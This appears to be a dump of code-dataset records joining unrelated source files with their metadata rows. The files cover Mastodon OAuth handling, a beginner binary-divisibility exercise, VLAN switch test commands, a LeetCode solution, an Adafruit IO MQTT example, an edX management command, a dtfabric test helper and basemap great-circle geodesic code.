instance_info = ndb.TextProperty() # JSON; from /api/v1/instance
app_url = ndb.StringProperty()
app_name = ndb.StringProperty()
created_at = ndb.DateTimeProperty(auto_now_add=True, required=True)
class MastodonAuth(BaseAuth):
"""An authenticated Mastodon user.
Provides methods that return information about this user and make OAuth-signed
requests to the Mastodon REST API. Stores OAuth credentials in the datastore.
See models.BaseAuth for usage details.
Key name is the fully qualified actor address, ie @[email protected].
Implements get() and post() but not urlopen() or api().
"""
app = ndb.KeyProperty()
access_token_str = ndb.TextProperty(required=True)
user_json = ndb.TextProperty()
def site_name(self):
return 'Mastodon'
def user_display_name(self):
"""Returns the user's full ActivityPub address, eg @[email protected]."""
return self.key.id()
def instance(self):
"""Returns the instance base URL, eg https://mastodon.social/."""
return self.app.get().instance
def username(self):
"""Returns the user's username, eg ryan."""
return json_loads(self.user_json).get('username')
def user_id(self):
"""Returns the user's id, eg 123."""
return json_loads(self.user_json).get('id')
def access_token(self):
"""Returns the OAuth access token string."""
return self.access_token_str
def get(self, *args, **kwargs):
"""Wraps requests.get() and adds instance base URL and Bearer token header."""
url = urljoin(self.instance(), args[0])
return self._requests_call(util.requests_get, url, *args[1:], **kwargs)
def post(self, *args, **kwargs):
"""Wraps requests.post() and adds the Bearer token header."""
return self._requests_call(util.requests_post, *args, **kwargs)
def _requests_call(self, fn, *args, **kwargs):
headers = kwargs.setdefault('headers', {})
headers['Authorization'] = 'Bearer ' + self.access_token_str
resp = fn(*args, **kwargs)
try:
resp.raise_for_status()
except BaseException as e:
util.interpret_http_exception(e)
raise
return resp
class StartHandler(handlers.StartHandler):
"""Starts Mastodon auth. Requests an auth code and expects a redirect back.
Attributes:
DEFAULT_SCOPE: string, default OAuth scope(s) to request
REDIRECT_PATHS: sequence of string URL paths (on this host) to register as
OAuth callback (aka redirect) URIs in the OAuth app
SCOPE_SEPARATOR: string, used to separate multiple scopes
"""
NAME = 'mastodon'
LABEL = 'Mastodon'
DEFAULT_SCOPE = 'read:accounts'
REDIRECT_PATHS = ()
SCOPE_SEPARATOR = ' '
@classmethod
def to(cls, path, **kwargs):
return super(StartHandler, cls).to(path, **kwargs)
def app_name(self):
"""Returns the user-visible name of this application.
To be overridden by subclasses. Displayed in Mastodon's OAuth prompt.
"""
return 'oauth-dropins demo'
def app_url(self):
"""Returns this application's web site.
To be overridden by subclasses. Displayed in Mastodon's OAuth prompt.
"""
return self.request.host_url
def redirect_url(self, state=None, instance=None):
"""Returns the local URL for Mastodon to redirect back to after OAuth prompt.
Args:
state: string, user-provided value to be returned as a query parameter in
the return redirect
instance: string, Mastodon instance base URL, e.g.
'https://mastodon.social'. May also be provided in the 'instance'
request as a URL query parameter or POST body.
Raises: ValueError if instance isn't a Mastodon instance.
"""
# normalize instance to URL
if not instance:
instance = util.get_required_param(self, 'instance')
instance = instance.strip().split('@')[-1] # handle addresses, eg [email protected]
parsed = urlparse(instance)
if not parsed.scheme:
instance = 'https://' + instance
# fetch instance info from this instance's API (mostly to test that it's
# actually a Mastodon instance)
try:
resp = util.requests_get(urljoin(instance, INSTANCE_API))
except requests.RequestException as e:
logging.info('Error', stack_info=True)
resp = None
is_json = resp and resp.headers.get('Content-Type', '').strip().startswith(
'application/json')
if is_json:
logging.info(resp.text)
if (not resp or not resp.ok or not is_json or
# Pixelfed (https://pixelfed.org/) pretends to be Mastodon but isn't
'Pixelfed' in resp.json().get('version')):
msg = "%s doesn't look like a Mastodon instance." % instance
logging.info(resp)
logging.info(msg)
raise ValueError(msg)
# if we got redirected, update instance URL
parsed = list(urlparse(resp.url))
parsed[2] = '/' # path
instance = urlunparse(parsed)
app_name = self.app_name()
app_url = self.app_url()
query = MastodonApp.query(MastodonApp.instance == instance,
MastodonApp.app_url == app_url)
if appengine_info.DEBUG:
# disambiguate different apps in dev_appserver, since their app_url will
# always be localhost
query = query.filter(MastodonApp.app_name == app_name)
app = query.get()
if not app:
app = self._register_app(instance, app_name, app_url)
app.instance_info = resp.text
app.put()
logging.info('Starting OAuth for Mastodon instance %s', instance)
app_data = json_loads(app.data)
return urljoin(instance, AUTH_CODE_API % {
'client_id': app_data['client_id'],
'client_secret': app_data['client_secret'],
'redirect_uri': quote_plus(self.to_url()),
'state': _encode_state(app, state),
'scope': self.scope,
})
def _register_app(self, instance, app_name, app_url):
"""Register a Mastodon API app on a specific instance.
https://docs.joinmastodon.org/api/rest/apps/
Args:
instance: string
app_name: string
app_url: string
Returns: MastodonApp
"""
logging.info("first time we've seen Mastodon instance %s with app %s %s! "
"registering an API app.", instance, app_name, app_url)
redirect_uris = set(urljoin(self.request.host_url, path)
for path in set(self.REDIRECT_PATHS))
redirect_uris.add(self.to_url())
resp = util.requests_post(
urljoin(instance, REGISTER_APP_API),
data=urlencode({
'client_name': app_name,
# Mastodon uses Doorkeeper for OAuth, which allows registering
# multiple redirect URIs, separated by newlines.
# https://github.com/doorkeeper-gem/doorkeeper/pull/298
# https://docs.joinmastodon.org/api/rest/apps/
'redirect_uris': '\n'.join(redirect_uris),
'website': app_url,
# https://docs.joinmastodon.org/api/permissions/
'scopes': self.SCOPE_SEPARATOR.join(ALL_SCOPES),
}))
resp.raise_for_status()
app_data = json_loads(resp.text)
logging.info('Got %s', app_data)
app = MastodonApp(instance=instance, app_name=app_name,
app_url=app_url, data=json_dumps(app_data))
app.put()
return app
@classmethod
def button_html(cls, *args, **kwargs):
kwargs['form_extra'] = kwargs.get('form_extra', '') + """
<input type="url" name="instance" class="form-control" placeholder="Mastodon instance" scheme="https" required style="width: 150px; height: 50px; display:inline;" />"""
return super(cls, cls).button_html(
*args, input_style='background-color: #EBEBEB; padding: 5px', **kwargs)
class CallbackHandler(handlers.CallbackHandler):
"""The OAuth callback. Fetches an access token and stores it."""
def get(self):
app_key, state = _decode_state(util.get_required_param(self, 'state'))
# handle errors
error = self.request.get('error')
desc = self.request.get('error_description')
if error:
# user_cancelled_login and user_cancelled_authorize are non-standard.
# https://tools.ietf.org/html/rfc6749#section-4.1.2.1
if error in ('user_cancelled_login', 'user_cancelled_authorize', 'access_denied'):
logging.info('User declined: %s', self.request.get('error_description'))
self.finish(None, state=state)
return
else:
msg = 'Error: %s: %s' % (error, desc)
logging.info(msg)
raise exc.HTTPBadRequest(msg)
app = ndb.Key(urlsafe=app_key).get()
assert app
app_data = json_loads(app.data)
# extract auth code and request access token
auth_code = util.get_required_param(self, 'code')
data = {
'grant_type': 'authorization_code',
'code': auth_code,
'client_id': app_data['client_id'],
'client_secret': app_data['client_secret'],
# redirect_uri here must be the same in the oauth code request!
# (the value here doesn't actually matter since it's requested server side.)
'redirect_uri': self.request.path_url,
}
resp = util.requests_post(urljoin(app.instance, ACCESS_TOKEN_API),
data=urlencode(data))
resp.raise_for_status()
resp_json = resp.json()
logging.debug('Access token response: %s', resp_json)
if resp_json.get('error'):
raise exc.HTTPBadRequest(resp_json)
access_token = resp_json['access_token']
user = MastodonAuth(app=app.key, access_token_str=access_token).get(VERIFY_API).json()
logging.debug('User: %s', user)
address = '@%s@%s' % (user['username'], urlparse(app.instance).netloc)
auth = MastodonAuth(id=address, app=app.key, access_token_str=access_token,
user_json=json_dumps(user))
auth.put()
self.finish(auth, state=state)
| [
"[email protected]"
] | |
4a9e8aa14c6caaa64e388c73cf1955139791697f | 3a771b72dae1aae406b94726bcbcf73915577b18 | /q11.py | 7957ae29604c51312fee4b0a13e0a5bfe42decff | [] | no_license | SHANK885/Python-Basic-Programs | 4fcb29280412baa63ffd33efba56d9f59770c9dc | 157f0f871b31c4523b6873ce5dfe0d6e26a6dc61 | refs/heads/master | 2021-07-18T18:24:10.455282 | 2018-11-19T07:02:27 | 2018-11-19T07:02:27 | 138,009,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | '''
Question:
Write a program which accepts a sequence of comma separated 4 digit binary numbers as its input and then check whether they are divisible by 5 or not. The numbers that are divisible by 5 are to be printed in a comma separated sequence.
Example:
0100,0011,1010,1001
Then the output should be:
1010
Notes: Assume the data is input by console.
'''
out = []
binary = input("Enter comma separated 4 digit binary number : ")
bin_list = [b for b in binary.split(",")]
for item in bin_list:
int_item = int(item, 2)
if int_item%5 == 0:
out.append(item)
print(",".join(out)) | [
"[email protected]"
] | |
4b817c90da1a1bf413b75b098e4e7aced20b4cdb | 8034442a9778043b1d886220a3c928327b6297d4 | /Case_rbm/vlan_bond/index.py | 2225ed51c99d287e815f12237d49525615f04bb8 | [] | no_license | wangqian0818/auto_test | 5efe6d7b41ff01e6a9f10211674f55e195484a1c | 803a485d9720f090f7fa5d4482092cc4e7d9aa73 | refs/heads/master | 2023-08-24T01:27:40.956398 | 2021-11-02T02:12:14 | 2021-11-02T02:12:14 | 367,355,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | #coding:utf-8
from common import baseinfo
vlanCardid = str(baseinfo.gwVlanCardid)
vlanA = str(baseinfo.vlanA)
vlanB = str(baseinfo.vlanB)
#配置下发
#列表里面的顺序依次为:查询命令,预期结果
case1_step1={
"step1":[f"export cardid={vlanCardid}&&switch-jsac --set --module 12 --switch on",f"export cardid={vlanCardid}&&switch-jsac --get | grep 12","on"],
"step2":[f"export cardid={vlanCardid}&&switch-jsac --set --module 15 --switch on",f"export cardid={vlanCardid}&&switch-jsac --get | grep 15","on"]
}
case1_step2={
"step1":[f"export cardid={vlanCardid}&&vlan-jsac --get",vlanA],
"step2":[f"export cardid={vlanCardid}&&vlan-jsac --get",vlanB],
"step3":[f"export cardid={vlanCardid}&&vlan-jsac --get |wc -l",'5']
}
case1_step11={
"step1":[f"export cardid={vlanCardid}&&switch-jsac --set --module 12 --switch off",f"export cardid={vlanCardid}&&switch-jsac --get | grep 12","off"],
"step2":[f"export cardid={vlanCardid}&&switch-jsac --set --module 15 --switch off",f"export cardid={vlanCardid}&&switch-jsac --get | grep 15","off"]
}
| [
"[email protected]"
] | |
beb8b556b8292e3e60a49a4dd5625d013750d1d7 | aa480d8b09dd7ad92c37c816ebcace24a35eb34c | /third-round/43.字符串相乘.py | cf3fd3f45529613e3a133392c58f55c8d88caa5a | [] | no_license | SR2k/leetcode | 7e701a0e99f9f05b21216f36d2f5ac07a079b97f | de131226159865dcb7b67e49a58d2ddc3f0a82c7 | refs/heads/master | 2023-03-18T03:37:02.916453 | 2022-09-16T01:28:13 | 2022-09-16T01:28:13 | 182,083,445 | 0 | 0 | null | 2023-03-08T05:44:26 | 2019-04-18T12:27:12 | Python | UTF-8 | Python | false | false | 1,634 | py | #
# @lc app=leetcode.cn id=43 lang=python3
#
# [43] 字符串相乘
#
# https://leetcode-cn.com/problems/multiply-strings/description/
#
# algorithms
# Medium (44.96%)
# Likes: 862
# Dislikes: 0
# Total Accepted: 205.5K
# Total Submissions: 457.8K
# Testcase Example: '"2"\n"3"'
#
# 给定两个以字符串形式表示的非负整数 num1 和 num2,返回 num1 和 num2 的乘积,它们的乘积也表示为字符串形式。
#
# 注意:不能使用任何内置的 BigInteger 库或直接将输入转换为整数。
#
#
#
# 示例 1:
#
#
# 输入: num1 = "2", num2 = "3"
# 输出: "6"
#
# 示例 2:
#
#
# 输入: num1 = "123", num2 = "456"
# 输出: "56088"
#
#
#
# 提示:
#
#
# 1 <= num1.length, num2.length <= 200
# num1 和 num2 只能由数字组成。
# num1 和 num2 都不包含任何前导零,除了数字0本身。
#
#
#
# @lc code=start
class Solution:
def multiply(self, num1: str, num2: str) -> str:
if num1 == '0' or num2 == '0':
return '0'
result = [0] * (len(num1) + len(num2))
for i in range(len(num1)):
for j in range(len(num2)):
r = (ord(num1[-(i + 1)]) - ord('0')) * (ord(num2[-(j + 1)]) - ord('0'))
result[i + j] += r
carry = 0
for i in range(len(result)):
d = result[i] + carry
carry = d // 10
result[i] = str(d % 10)
while result[-1] == '0':
result.pop()
result.reverse()
return "".join(result)
# @lc code=end
print(Solution().multiply("2", "3"))
print(Solution().multiply("123", "456"))
| [
"[email protected]"
] | |
1edb79a9fc5cdd76785d4f5fbdf777056346feff | 2bcc421ee345b00cf805c543b37d18b5d019dc04 | /adafruit-circuitpython-bundle-6.x-mpy-20201126/examples/adafruit_io_simpletest.py | 13f48ce77609ae495c9aae8bea5cbbb6b5a5fc34 | [] | no_license | saewoonam/sc-current-source-titano | 5a1ad46889c1b09c168424901fd71cb4eab5c61b | 1c136aa8b61268d9ac0b5a682b30ece70ab87663 | refs/heads/main | 2023-03-02T22:12:26.685537 | 2021-02-09T03:28:01 | 2021-02-09T03:28:01 | 317,299,900 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,684 | py | # Example of using the Adafruit IO CircuitPython MQTT client
# to subscribe to an Adafruit IO feed and publish random data
# to be received by the feed.
#
# Example by Tony DiCola for Adafruit Industries
# Modified by Brent Rubell for Adafruit Industries, 2019
import time
from random import randint
import board
import busio
from digitalio import DigitalInOut
from adafruit_esp32spi import adafruit_esp32spi
from adafruit_esp32spi import adafruit_esp32spi_wifimanager
import adafruit_esp32spi.adafruit_esp32spi_socket as socket
import neopixel
import adafruit_minimqtt.adafruit_minimqtt as MQTT
from adafruit_io.adafruit_io import IO_MQTT
### WiFi ###
# Get wifi details and more from a secrets.py file
try:
from secrets import secrets
except ImportError:
print("WiFi secrets are kept in secrets.py, please add them there!")
raise
# If you are using a board with pre-defined ESP32 Pins:
esp32_cs = DigitalInOut(board.ESP_CS)
esp32_ready = DigitalInOut(board.ESP_BUSY)
esp32_reset = DigitalInOut(board.ESP_RESET)
# If you have an externally connected ESP32:
# esp32_cs = DigitalInOut(board.D9)
# esp32_ready = DigitalInOut(board.D10)
# esp32_reset = DigitalInOut(board.D5)
spi = busio.SPI(board.SCK, board.MOSI, board.MISO)
esp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)
"""Use below for Most Boards"""
status_light = neopixel.NeoPixel(
board.NEOPIXEL, 1, brightness=0.2
) # Uncomment for Most Boards
"""Uncomment below for ItsyBitsy M4"""
# status_light = dotstar.DotStar(board.APA102_SCK, board.APA102_MOSI, 1, brightness=0.2)
# Uncomment below for an externally defined RGB LED
# import adafruit_rgbled
# from adafruit_esp32spi import PWMOut
# RED_LED = PWMOut.PWMOut(esp, 26)
# GREEN_LED = PWMOut.PWMOut(esp, 27)
# BLUE_LED = PWMOut.PWMOut(esp, 25)
# status_light = adafruit_rgbled.RGBLED(RED_LED, BLUE_LED, GREEN_LED)
wifi = adafruit_esp32spi_wifimanager.ESPSPI_WiFiManager(esp, secrets, status_light)
# Define callback functions which will be called when certain events happen.
# pylint: disable=unused-argument
def connected(client):
# Connected function will be called when the client is connected to Adafruit IO.
# This is a good place to subscribe to feed changes. The client parameter
# passed to this function is the Adafruit IO MQTT client so you can make
# calls against it easily.
print("Connected to Adafruit IO! Listening for DemoFeed changes...")
# Subscribe to changes on a feed named DemoFeed.
client.subscribe("DemoFeed")
def subscribe(client, userdata, topic, granted_qos):
# This method is called when the client subscribes to a new feed.
print("Subscribed to {0} with QOS level {1}".format(topic, granted_qos))
def unsubscribe(client, userdata, topic, pid):
# This method is called when the client unsubscribes from a feed.
print("Unsubscribed from {0} with PID {1}".format(topic, pid))
# pylint: disable=unused-argument
def disconnected(client):
# Disconnected function will be called when the client disconnects.
print("Disconnected from Adafruit IO!")
# pylint: disable=unused-argument
def message(client, feed_id, payload):
# Message function will be called when a subscribed feed has a new value.
# The feed_id parameter identifies the feed, and the payload parameter has
# the new value.
print("Feed {0} received new value: {1}".format(feed_id, payload))
# Connect to WiFi
print("Connecting to WiFi...")
wifi.connect()
print("Connected!")
# Initialize MQTT interface with the esp interface
MQTT.set_socket(socket, esp)
# Initialize a new MQTT Client object
mqtt_client = MQTT.MQTT(
broker="io.adafruit.com",
username=secrets["aio_username"],
password=secrets["aio_key"],
)
# Initialize an Adafruit IO MQTT Client
io = IO_MQTT(mqtt_client)
# Connect the callback methods defined above to Adafruit IO
io.on_connect = connected
io.on_disconnect = disconnected
io.on_subscribe = subscribe
io.on_unsubscribe = unsubscribe
io.on_message = message
# Connect to Adafruit IO
print("Connecting to Adafruit IO...")
io.connect()
# Below is an example of manually publishing a new value to Adafruit IO.
last = 0
print("Publishing a new message every 10 seconds...")
while True:
# Explicitly pump the message loop.
io.loop()
# Send a new message every 10 seconds.
if (time.monotonic() - last) >= 5:
value = randint(0, 100)
print("Publishing {0} to DemoFeed.".format(value))
io.publish("DemoFeed", value)
last = time.monotonic()
| [
"[email protected]"
] | |
26903997659e0a6ffeafaf3ae4e966b68f912e5f | a9e3f3ad54ade49c19973707d2beb49f64490efd | /Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/cms/djangoapps/contentstore/management/commands/update_course_outline.py | b3ba3bd289199b663c7d1951a01790bf3d31bc50 | [
"MIT",
"AGPL-3.0-only",
"AGPL-3.0-or-later"
] | permissive | luque/better-ways-of-thinking-about-software | 8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d | 5809eaca7079a15ee56b0b7fcfea425337046c97 | refs/heads/master | 2021-11-24T15:10:09.785252 | 2021-11-22T12:14:34 | 2021-11-22T12:14:34 | 163,850,454 | 3 | 1 | MIT | 2021-11-22T12:12:31 | 2019-01-02T14:21:30 | JavaScript | UTF-8 | Python | false | false | 867 | py | """
Management command to create the course outline for a course. This is done
automatically when Studio publishes a course, but this command can be used to
do it manually for debugging, error recovery, or backfilling purposes.
Should be invoked from the Studio process.
"""
from django.core.management.base import BaseCommand
from opaque_keys.edx.keys import CourseKey
from ...tasks import update_outline_from_modulestore
class Command(BaseCommand):
"""
Invoke with:
python manage.py cms update_course_outline <course_key>
"""
help = "Updates a single course outline based on modulestore content."
def add_arguments(self, parser):
parser.add_argument('course_key')
def handle(self, *args, **options):
course_key = CourseKey.from_string(options['course_key'])
update_outline_from_modulestore(course_key)
| [
"[email protected]"
] | |
112fe187347b14db8e486b104480e002a756dd8c | 7ae32748fb910d2542e35c57543fc89f98cd2b1d | /tests/test_lib.py | e9e421020e8b554caa7f433988afc2ac71c66236 | [
"Apache-2.0"
] | permissive | sanjaymsh/dtfabric | 451c87d987f438fccfbb999079d2f55d01650b68 | 9e216f90b70d8a3074b2125033e0773e3e482355 | refs/heads/master | 2022-12-19T09:13:02.370724 | 2020-09-27T05:11:25 | 2020-09-27T05:11:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,535 | py | # -*- coding: utf-8 -*-
"""Shared test case."""
from __future__ import unicode_literals
import os
import sys
import unittest
from dtfabric import reader
from dtfabric import registry
def skipUnlessHasTestFile(path_segments): # pylint: disable=invalid-name
"""Decorator to skip a test if the test file does not exist.
Args:
path_segments (list[str]): path segments inside the test data directory.
Returns:
function: to invoke.
"""
fail_unless_has_test_file = getattr(
unittest, 'fail_unless_has_test_file', False)
path = os.path.join('test_data', *path_segments)
if fail_unless_has_test_file or os.path.exists(path):
return lambda function: function
if sys.version_info[0] < 3:
path = path.encode('utf-8')
# Note that the message should be of type str which is different for
# different versions of Python.
return unittest.skip('missing test file: {0:s}'.format(path))
class BaseTestCase(unittest.TestCase):
"""The base test case."""
_TEST_DATA_PATH = os.path.join(os.getcwd(), 'test_data')
# Show full diff results, part of TestCase so does not follow our naming
# conventions.
maxDiff = None
def _CreateDefinitionRegistryFromFile(self, path):
"""Creates a data type definition registry from a file.
Args:
path (str): path to the data definition file.
Returns:
DataTypeDefinitionsRegistry: data type definition registry or None
on error.
"""
definitions_registry = registry.DataTypeDefinitionsRegistry()
self._FillDefinitionRegistryFromFile(definitions_registry, path)
return definitions_registry
def _FillDefinitionRegistryFromFile(self, definitions_registry, path):
"""Fills a data type definition registry from a file.
Args:
definitions_registry (DataTypeDefinitionsRegistry): data type definitions
registry.
path (str): path to the data definition file.
"""
definitions_reader = reader.YAMLDataTypeDefinitionsFileReader()
with open(path, 'rb') as file_object:
definitions_reader.ReadFileObject(definitions_registry, file_object)
def _GetTestFilePath(self, path_segments):
"""Retrieves the path of a test file in the test data directory.
Args:
path_segments (list[str]): path segments inside the test data directory.
Returns:
str: path of the test file.
"""
# Note that we need to pass the individual path segments to os.path.join
# and not a list.
return os.path.join(self._TEST_DATA_PATH, *path_segments)
| [
"[email protected]"
] | |
51c55ec4d3adb87bc769bf5e76a5abfeeda74e4f | 9e567b8241ce00e9d53843f5aba11c4a119b079f | /tags/v0_5_2/toolkits/basemap/lib/matplotlib/toolkits/basemap/greatcircle.py | 2e205689bff14ecd1a2a0c9c1f4120bfd5ffb277 | [
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-other-permissive",
"LicenseRef-scancode-us-govt-public-domain",
"MIT"
] | permissive | neilpanchal/matplotlib | 3d2a7133e858c4eefbb6c2939eb3f7a328b18118 | 7565d1f2943e0e7b4a3f11ce692dfb9b548d0b83 | refs/heads/master | 2020-06-11T09:20:43.941323 | 2011-01-21T21:50:16 | 2011-01-21T21:50:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,660 | py | import numarray as N
import math
__version__ = '1.0'
class GreatCircle:
"""
formula for perfect sphere from Ed Williams' 'Aviation Formulary'
(http://williams.best.vwh.net/avform.htm)
code for ellipsoid posted to GMT mailing list by Jim Leven in Dec 1999
Version: %s
Contact: Jeff Whitaker <[email protected]>
""" % __version__
def __init__(self,rmajor,rminor,lon1,lat1,lon2,lat2):
"""
Define a great circle by specifying:
rmajor - radius of major axis of ellipsoid
rminor - radius of minor axis of ellipsoid.
lon1 - starting longitude of great circle
lat1 - starting latitude
lon2 - ending longitude
lat2 - ending latitude
All must be given in degrees.
Instance variables:
distance - distance along great circle in radians.
lon1,lat1,lon2,lat2 - start and end points (in radians).
"""
# convert to radians from degrees.
lat1 = math.radians(lat1)
lon1 = math.radians(lon1)
lat2 = math.radians(lat2)
lon2 = math.radians(lon2)
self.a = rmajor
self.f = (rmajor-rminor)/rmajor
self.lat1 = lat1
self.lat2 = lat2
self.lon1 = lon1
self.lon2 = lon2
# distance along geodesic in meters.
d,a12,a21 = vinc_dist(self.f, self.a, lat1, lon1, lat2, lon2 )
self.distance = d
self.azimuth12 = a12
self.azimuth21 = a21
# great circle arc-length distance (in radians).
self.gcarclen = 2.*math.asin(math.sqrt((math.sin((lat1-lat2)/2))**2+\
math.cos(lat1)*math.cos(lat2)*(math.sin((lon1-lon2)/2))**2))
# check to see if points are antipodal (if so, route is undefined).
if self.gcarclen == math.pi:
self.antipodal = True
else:
self.antipodal = False
def points(self,npoints):
"""
compute arrays of npoints equally spaced
intermediate points along the great circle.
input parameter npoints is the number of points
to compute.
Returns lons, lats (lists with longitudes and latitudes
of intermediate points in degrees).
For example npoints=10 will return arrays lons,lats of 10
equally spaced points along the great circle.
"""
# must ask for at least 2 points.
if npoints <= 1:
raise ValueError,'npoints must be greater than 1'
elif npoints == 2:
return [math.degrees(self.lon1),math.degrees(self.lon2)],[math.degrees(self.lat1),math.degrees(self.lat2)]
# can't do it if endpoints are antipodal, since
# route is undefined.
if self.antipodal:
raise ValueError,'cannot compute intermediate points on a great circle whose endpoints are antipodal'
d = self.gcarclen
delta = 1.0/(npoints-1)
f = delta*N.arange(npoints) # f=0 is point 1, f=1 is point 2.
incdist = self.distance/(npoints-1)
lat1 = self.lat1
lat2 = self.lat2
lon1 = self.lon1
lon2 = self.lon2
# perfect sphere, use great circle formula
if self.f == 0.:
A = N.sin((1-f)*d)/math.sin(d)
B = N.sin(f*d)/math.sin(d)
x = A*math.cos(lat1)*math.cos(lon1)+B*math.cos(lat2)*math.cos(lon2)
y = A*math.cos(lat1)*math.sin(lon1)+B*math.cos(lat2)*math.sin(lon2)
z = A*math.sin(lat1) +B*math.sin(lat2)
lats=N.arctan2(z,N.sqrt(x**2+y**2))
lons=N.arctan2(y,x)
lons = map(math.degrees,lons.tolist())
lats = map(math.degrees,lats.tolist())
# use ellipsoid formulas
else:
latpt = self.lat1
lonpt = self.lon1
azimuth = self.azimuth12
lons = [math.degrees(lonpt)]
lats = [math.degrees(latpt)]
for n in range(npoints-2):
latptnew,lonptnew,alpha21=vinc_pt(self.f,self.a,latpt,lonpt,azimuth,incdist)
d,azimuth,a21=vinc_dist(self.f,self.a,latptnew,lonptnew,lat2,lon2)
lats.append(math.degrees(latptnew))
lons.append(math.degrees(lonptnew))
latpt = latptnew; lonpt = lonptnew
lons.append(math.degrees(self.lon2))
lats.append(math.degrees(self.lat2))
return lons,lats
#
# ---------------------------------------------------------------------
# | |
# | geodetic.py - a collection of geodetic functions |
# | |
# ---------------------------------------------------------------------
#
#
# ----------------------------------------------------------------------
# | Algrothims from Geocentric Datum of Australia Technical Manual |
# | |
# | http://www.anzlic.org.au/icsm/gdatum/chapter4.html |
# | |
# | This page last updated 11 May 1999 |
# | |
# | Computations on the Ellipsoid |
# | |
# | There are a number of formulae that are available |
# | to calculate accurate geodetic positions, |
# | azimuths and distances on the ellipsoid. |
# | |
# | Vincenty's formulae (Vincenty, 1975) may be used |
# | for lines ranging from a few cm to nearly 20,000 km, |
# | with millimetre accuracy. |
# | The formulae have been extensively tested |
# | for the Australian region, by comparison with results |
# | from other formulae (Rainsford, 1955 & Sodano, 1965). |
# | |
# | * Inverse problem: azimuth and distance from known |
# | latitudes and longitudes |
# | * Direct problem: Latitude and longitude from known |
# | position, azimuth and distance. |
# | * Sample data |
# | * Excel spreadsheet |
# | |
# | Vincenty's Inverse formulae |
# | Given: latitude and longitude of two points |
# | (phi1, lembda1 and phi2, lembda2), |
# | Calculate: the ellipsoidal distance (s) and |
# | forward and reverse azimuths between the points (alpha12, alpha21). |
# | |
# ----------------------------------------------------------------------
def vinc_dist( f, a, phi1, lembda1, phi2, lembda2 ) :
"""
Returns the distance between two geographic points on the ellipsoid
and the forward and reverse azimuths between these points.
lats, longs and azimuths are in radians, distance in metres
Returns ( s, alpha12, alpha21 ) as a tuple
"""
if (abs( phi2 - phi1 ) < 1e-8) and ( abs( lembda2 - lembda1) < 1e-8 ) :
return 0.0, 0.0, 0.0
two_pi = 2.0*math.pi
piD4 = two_pi/8.0
b = a * (1.0 - f)
TanU1 = (1-f) * math.tan( phi1 )
TanU2 = (1-f) * math.tan( phi2 )
U1 = math.atan(TanU1)
U2 = math.atan(TanU2)
lembda = lembda2 - lembda1
last_lembda = -4000000.0 # an impossibe value
omega = lembda
# Iterate the following equations,
# until there is no significant change in lembda
while ( last_lembda < -3000000.0 or lembda != 0 and abs( (last_lembda - lembda)/lembda) > 1.0e-9 ) :
sqr_sin_sigma = pow( math.cos(U2) * math.sin(lembda), 2) + \
pow( (math.cos(U1) * math.sin(U2) - \
math.sin(U1) * math.cos(U2) * math.cos(lembda) ), 2 )
Sin_sigma = math.sqrt( sqr_sin_sigma )
Cos_sigma = math.sin(U1) * math.sin(U2) + math.cos(U1) * math.cos(U2) * math.cos(lembda)
sigma = math.atan2( Sin_sigma, Cos_sigma )
Sin_alpha = math.cos(U1) * math.cos(U2) * math.sin(lembda) / math.sin(sigma)
alpha = math.asin( Sin_alpha )
Cos2sigma_m = math.cos(sigma) - (2 * math.sin(U1) * math.sin(U2) / pow(math.cos(alpha), 2) )
C = (f/16) * pow(math.cos(alpha), 2) * (4 + f * (4 - 3 * pow(math.cos(alpha), 2)))
last_lembda = lembda
lembda = omega + (1-C) * f * math.sin(alpha) * (sigma + C * math.sin(sigma) * \
(Cos2sigma_m + C * math.cos(sigma) * (-1 + 2 * pow(Cos2sigma_m, 2) )))
u2 = pow(math.cos(alpha),2) * (a*a-b*b) / (b*b)
A = 1 + (u2/16384) * (4096 + u2 * (-768 + u2 * (320 - 175 * u2)))
B = (u2/1024) * (256 + u2 * (-128+ u2 * (74 - 47 * u2)))
delta_sigma = B * Sin_sigma * (Cos2sigma_m + (B/4) * \
(Cos_sigma * (-1 + 2 * pow(Cos2sigma_m, 2) ) - \
(B/6) * Cos2sigma_m * (-3 + 4 * sqr_sin_sigma) * \
(-3 + 4 * pow(Cos2sigma_m,2 ) )))
s = b * A * (sigma - delta_sigma)
alpha12 = math.atan2( (math.cos(U2) * math.sin(lembda)), \
(math.cos(U1) * math.sin(U2) - math.sin(U1) * math.cos(U2) * math.cos(lembda)))
alpha21 = math.atan2( (math.cos(U1) * math.sin(lembda)), \
(-math.sin(U1) * math.cos(U2) + math.cos(U1) * math.sin(U2) * math.cos(lembda)))
if ( alpha12 < 0.0 ) :
alpha12 = alpha12 + two_pi
if ( alpha12 > two_pi ) :
alpha12 = alpha12 - two_pi
alpha21 = alpha21 + two_pi / 2.0
if ( alpha21 < 0.0 ) :
alpha21 = alpha21 + two_pi
if ( alpha21 > two_pi ) :
alpha21 = alpha21 - two_pi
return s, alpha12, alpha21
# END of Vincenty's Inverse formulae
#-------------------------------------------------------------------------------
# Vincenty's Direct formulae |
# Given: latitude and longitude of a point (phi1, lembda1) and |
# the geodetic azimuth (alpha12) |
# and ellipsoidal distance in metres (s) to a second point, |
# |
# Calculate: the latitude and longitude of the second point (phi2, lembda2) |
# and the reverse azimuth (alpha21). |
# |
#-------------------------------------------------------------------------------
def vinc_pt( f, a, phi1, lembda1, alpha12, s ) :
"""
Returns the lat and long of projected point and reverse azimuth
given a reference point and a distance and azimuth to project.
lats, longs and azimuths are passed in decimal degrees
Returns ( phi2, lambda2, alpha21 ) as a tuple
"""
two_pi = 2.0*math.pi
piD4 = math.pi/4.0
if ( alpha12 < 0.0 ) :
alpha12 = alpha12 + two_pi
if ( alpha12 > two_pi ) :
alpha12 = alpha12 - two_pi
b = a * (1.0 - f)
TanU1 = (1-f) * math.tan(phi1)
U1 = math.atan( TanU1 )
sigma1 = math.atan2( TanU1, math.cos(alpha12) )
Sinalpha = math.cos(U1) * math.sin(alpha12)
cosalpha_sq = 1.0 - Sinalpha * Sinalpha
